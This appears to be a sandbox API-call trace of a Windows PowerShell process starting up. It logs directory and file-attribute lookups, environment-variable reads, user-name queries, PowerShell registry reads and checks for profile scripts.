	[0788.996] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x321f30 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0788.996] CoTaskMemFree (pv=0x321f30) 
	[0788.997] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0788.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.997] CoTaskMemFree (pv=0x27b790) 
	[0788.998] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0788.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.998] CoTaskMemFree (pv=0x27b790) 
	[0789.013] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0789.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.013] CoTaskMemFree (pv=0x27b790) 
	[0789.017] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0789.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.017] CoTaskMemFree (pv=0x27b790) 
	[0789.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.018] SetErrorMode (uMode=0x1) returned 0x1
	[0789.019] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0789.019] SetErrorMode (uMode=0x1) returned 0x1
	[0789.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.019] SetErrorMode (uMode=0x1) returned 0x1
	[0789.019] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0789.019] SetErrorMode (uMode=0x1) returned 0x1
	[0789.020] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0789.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.020] CoTaskMemFree (pv=0x27b790) 
	[0789.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.025] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.025] SetErrorMode (uMode=0x1) returned 0x1
	[0789.025] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.025] SetErrorMode (uMode=0x1) returned 0x1
	[0789.025] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.026] SetErrorMode (uMode=0x1) returned 0x1
	[0789.026] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.026] SetErrorMode (uMode=0x1) returned 0x1
	[0789.026] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.026] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.026] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.026] SetErrorMode (uMode=0x1) returned 0x1
	[0789.026] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0789.026] SetErrorMode (uMode=0x1) returned 0x1
	[0789.027] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.027] SetErrorMode (uMode=0x1) returned 0x1
	[0789.027] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0789.027] SetErrorMode (uMode=0x1) returned 0x1
	[0789.027] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.027] SetErrorMode (uMode=0x1) returned 0x1
	[0789.027] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0789.028] SetErrorMode (uMode=0x1) returned 0x1
	[0789.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.028] SetErrorMode (uMode=0x1) returned 0x1
	[0789.028] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xccff0 | out: lpFileInformation=0xccff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0789.028] SetErrorMode (uMode=0x1) returned 0x1
	[0789.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.029] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.029] SetErrorMode (uMode=0x1) returned 0x1
	[0789.029] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0789.029] SetErrorMode (uMode=0x1) returned 0x1
	[0789.029] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.029] SetErrorMode (uMode=0x1) returned 0x1
	[0789.029] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0789.029] SetErrorMode (uMode=0x1) returned 0x1
	[0789.029] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0789.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.030] SetErrorMode (uMode=0x1) returned 0x1
	[0789.030] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0789.030] SetErrorMode (uMode=0x1) returned 0x1
	[0789.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.030] SetErrorMode (uMode=0x1) returned 0x1
	[0789.030] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0789.030] SetErrorMode (uMode=0x1) returned 0x1
	[0789.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0789.033] SetErrorMode (uMode=0x1) returned 0x1
	[0789.033] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd2f0 | out: lpFileInformation=0xcd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0789.033] SetErrorMode (uMode=0x1) returned 0x1
	[0790.973] CoTaskMemAlloc (cb=0x804) returned 0x1b81d560
	[0790.973] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81d560, nSize=0xcd658 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd658) returned 0x1
	[0790.974] CoTaskMemFree (pv=0x1b81d560) 
	[0790.974] CoTaskMemAlloc (cb=0x204) returned 0x2c73a0
	[0790.974] GetUserNameW (in: lpBuffer=0x2c73a0, pcbBuffer=0xcd698 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd698) returned 1
	[0790.974] CoTaskMemFree (pv=0x2c73a0) 
	[0790.975] ReportEventW (hEventLog=0x1b6b0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef3940*="Available", lpRawData=0x2ef36d0) returned 1
	[0791.783] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.783] CoTaskMemFree (pv=0x27b790) 
	[0791.783] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.784] CoTaskMemFree (pv=0x27b790) 
	[0791.785] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.785] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0791.785] CoTaskMemFree (pv=0x27b790) 
	[0791.786] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.786] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0791.786] CoTaskMemFree (pv=0x27b790) 
	[0791.788] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd678 | out: phkResult=0xcd678*=0x398) returned 0x0
	[0791.788] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5fc, lpData=0x0, lpcbData=0xcd5f8*=0x0 | out: lpType=0xcd5fc*=0x1, lpData=0x0, lpcbData=0xcd5f8*=0x56) returned 0x0
	[0791.788] CoTaskMemAlloc (cb=0x5a) returned 0x1b82e6b0
	[0791.788] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5cc, lpData=0x1b82e6b0, lpcbData=0xcd5c8*=0x56 | out: lpType=0xcd5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd5c8*=0x56) returned 0x0
	[0791.788] CoTaskMemFree (pv=0x1b82e6b0) 
	[0791.788] RegCloseKey (hKey=0x398) returned 0x0
	[0791.789] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.789] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.789] CoTaskMemFree (pv=0x27b790) 
	[0791.802] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.802] CoTaskMemFree (pv=0x27b790) 
	[0791.809] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.809] CoTaskMemFree (pv=0x27b790) 
	[0791.810] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.810] CoTaskMemFree (pv=0x27b790) 
	[0791.810] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.810] CoTaskMemFree (pv=0x27b790) 
	[0791.811] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.811] CoTaskMemFree (pv=0x27b790) 
	[0791.813] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.813] CoTaskMemFree (pv=0x27b790) 
	[0791.813] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.813] CoTaskMemFree (pv=0x27b790) 
	[0791.845] CoTaskMemAlloc (cb=0x104) returned 0x27b790
	[0791.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27b790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.845] CoTaskMemFree (pv=0x27b790) 
	[0793.770] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x27bbd0
	[0793.772] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x27bce0
	[0800.211] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0800.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.212] CoTaskMemFree (pv=0x27bdf0) 
	[0800.216] CoTaskMemAlloc (cb=0x104) returned 0x27bdf0
	[0800.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bdf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.216] CoTaskMemFree (pv=0x27bdf0) 
	[0801.050] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7d8 | out: phkResult=0xcd7d8*=0x39c) returned 0x0
	[0801.050] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd75c, lpData=0x0, lpcbData=0xcd758*=0x0 | out: lpType=0xcd75c*=0x1, lpData=0x0, lpcbData=0xcd758*=0x56) returned 0x0
	[0801.050] CoTaskMemAlloc (cb=0x5a) returned 0x1b804dc0
	[0801.050] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd72c, lpData=0x1b804dc0, lpcbData=0xcd728*=0x56 | out: lpType=0xcd72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd728*=0x56) returned 0x0
	[0801.050] CoTaskMemFree (pv=0x1b804dc0) 
	[0801.050] RegCloseKey (hKey=0x39c) returned 0x0
	[0801.050] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd7d8 | out: phkResult=0xcd7d8*=0x39c) returned 0x0
	[0801.050] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd75c, lpData=0x0, lpcbData=0xcd758*=0x0 | out: lpType=0xcd75c*=0x1, lpData=0x0, lpcbData=0xcd758*=0x56) returned 0x0
	[0801.050] CoTaskMemAlloc (cb=0x5a) returned 0x1b804dc0
	[0801.050] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd72c, lpData=0x1b804dc0, lpcbData=0xcd728*=0x56 | out: lpType=0xcd72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd728*=0x56) returned 0x0
	[0801.051] CoTaskMemFree (pv=0x1b804dc0) 
	[0801.051] RegCloseKey (hKey=0x39c) returned 0x0
	[0801.053] CoTaskMemAlloc (cb=0x20c) returned 0x1b801300
	[0801.054] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b801300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0801.055] CoTaskMemFree (pv=0x1b801300) 
	[0801.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0801.055] CoTaskMemAlloc (cb=0x20c) returned 0x1b801300
	[0801.055] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b801300 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0801.056] CoTaskMemFree (pv=0x1b801300) 
	[0801.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd390, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0801.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0801.058] SetErrorMode (uMode=0x1) returned 0x1
	[0801.058] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.058] SetErrorMode (uMode=0x1) returned 0x1
	[0801.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0801.058] SetErrorMode (uMode=0x1) returned 0x1
	[0801.059] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.059] SetErrorMode (uMode=0x1) returned 0x1
	[0801.059] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0801.059] SetErrorMode (uMode=0x1) returned 0x1
	[0801.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd740 | out: lpFileInformation=0xcd740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0801.059] SetErrorMode (uMode=0x1) returned 0x1
